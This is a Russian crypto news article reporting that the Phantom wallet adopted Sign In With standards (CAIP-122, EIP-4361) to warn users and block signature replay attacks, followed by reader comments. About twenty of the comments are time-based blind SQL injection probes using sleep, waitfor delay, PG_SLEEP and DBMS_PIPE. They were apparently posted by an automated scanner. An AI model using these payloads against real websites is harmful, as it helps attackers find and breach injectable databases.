Кошелёк Phantom поддержал стандарты аутентификации для защиты от фишинга

Приложение криптокошелька Phantom добавило поддержку стандартов «Войти с помощью» (Sign In With или SIW) для повышения безопасности пользователей и защиты от фишинговых атак.

Криптокошелёк Phantom будет предоставлять пользователям необходимую информацию при взаимодействии с децентрализованными приложениями (dApps), которые соблюдают определённые стандарты безопасности для криптопользователей Solana и Ethereum, включая Sign In With X (CAIP-122) и Sign In With Ethereum (EIP-4361).

Эти стандарты помогают криптографическим учётным записям безопасно аутентифицироваться с помощью автономных сервисов путём подписания сообщения. Новая функция стала дополнением к набору услуг безопасности Phantom и остаётся на усмотрение команды dApps.

Если dApp реализует формат SIW, но имеет недопустимые поля, Phantom выдаст пользователям предупреждение. Для предотвращения атак с повторением подписи кошелёк будет отображать всплывающие поля, отражающие такую информацию, как доменное имя сайта и одноразовый номер.

Такие атаки происходят, когда злоумышленник перехватывает цифровую подпись, а затем использует её для получения несанкционированного доступа. Цифровые подписи используются для проверки подлинности транзакций и сообщений, но если злоумышленнику удастся их перехватить, он может обойти процесс аутентификации и получить доступ к конфиденциальным данным и украсть активы.



Звёзд: 1Звёзд: 2Звёзд: 3Звёзд: 4Звёзд: 5 (1 оценок, среднее: 5,00 из 5)
Загрузка...
Светлана Сухарева журналист криптовалюта Happy Coin News

Редактор, работает в Happy Coin News с 2016 года, превращая ресурс в источник аналитики о криптовалютах. Видит свою цель работы в финансовом просвещении.

  1. Alexa

    10.02.2023

    Дарю тебе я этот кошелек, Пусть будет от него хороший толк. Чтоб денежки приятно в нем хрустели,
    И чтоб кармашки никогда не опустели. 🙂 Кошелек Фантом, деньги вроде есть и как бы их нет !!

  2. Irina

    11.02.2023

    Забавное название кошелька придумали. Главное, чтобы был надёжный.

  3. reda

    11.02.2023

    Мне понравилась эта новость, спасибо

  4. if(now()=sysdate(),sleep(15),0)

    11.02.2023
  5. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

    11.02.2023
  6. -1); waitfor delay '0:0:15' --

    11.02.2023
  7. 1 waitfor delay '0:0:15' --

    11.02.2023
  8. -5 OR 501=(SELECT 501 FROM PG_SLEEP(15))--

    11.02.2023
  9. -5) OR 734=(SELECT 734 FROM PG_SLEEP(15))--

    11.02.2023
  10. -1)) OR 156=(SELECT 156 FROM PG_SLEEP(15))--

    11.02.2023
  11. lepCvkyA' OR 314=(SELECT 314 FROM PG_SLEEP(15))--

    11.02.2023
  12. YhlZTfcg') OR 401=(SELECT 401 FROM PG_SLEEP(15))--

    11.02.2023
  13. 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

    11.02.2023
  14. if(now()=sysdate(),sleep(15),0)

  15. (select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'»+(select(0)from(select(sleep(15)))v)+»*/

  16. -1); waitfor delay ‘0:0:15’ —

  17. Nqej9Gnf’; waitfor delay ‘0:0:15’ —

  18. -5) OR 432=(SELECT 432 FROM PG_SLEEP(15))—

  19. 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  20. -1; waitfor delay ‘0:0:15’ —

  21. 1 waitfor delay ‘0:0:15’ —

  22. -5) OR 24=(SELECT 24 FROM PG_SLEEP(15))—

  23. ndL9vSEm’) OR 21=(SELECT 21 FROM PG_SLEEP(15))—

  24. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  25. Дмитрий

    11.02.2023

    Главное чтобы этот кошелек был хорошо защищён,от взлома,а так надо попробовать его и потом я напишу более подробный отзыв.

  26. Петр

    11.02.2023

    Будем считать, что значительно уменьшится количество пoлучeния нecaнкциoниpoвaннoгo дocтупa к кошелькам.

  27. Сергей

    11.02.2023

    Phantom кoшeлёк надо будет завести проферить что к чему.

Оставить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *